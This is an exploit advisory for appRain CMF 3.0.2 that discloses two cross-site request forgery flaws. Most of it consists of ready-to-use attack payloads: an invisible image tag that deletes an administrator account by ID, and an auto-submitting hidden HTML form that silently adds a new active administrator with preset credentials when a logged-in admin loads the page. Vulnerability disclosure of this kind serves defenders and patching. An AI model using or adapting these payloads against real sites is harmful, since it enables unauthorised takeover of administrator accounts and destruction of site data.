###################################################################################################################################
# Exploit Title: Apprain CMF / CSRF ADD/DELETE administrator's account
# Date: 2013 29 August
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://www.apprain.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 3.0.2
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################
Summary:
========
1. CSRF - Delete a account
2. CSRF - Adding administrator's account
1. CSRF - Delete a account:
===========================
Deleting account section isn't protected against CSRF attacks, it's a simple get, the following exploit is useful to conduct an attack, albeit [ID] must be replaced by administrator's ID (e.g. 2)
<img src="http://localhost//appRain-v-3.0.2/common/delete_row/Admin/[ID]" width="1" height="1">
2. CSRF - Adding administrator's account:
=========================================
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="http://localhost/appRain-v-3.0.2/admin/manage/add" method="post">
<input type="hidden" name="data[Admin][f_name]" value="yashar">
<input type="hidden" name="data[Admin][l_name]" value="shahinzadeh">
<input type="hidden" name="data[Admin][email]" value="y.shahinzadeh@gmail.com">
<input type="hidden" name="data[Admin][username]" value="yashar">
<input type="hidden" name="data[Admin][password]" value="Yashar123">
<input type="hidden" name="data[Admin][status]" value="Active">
<input type="hidden" name="data[Admin][description]" value="">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
/** Yasshar shahinzadeh **/
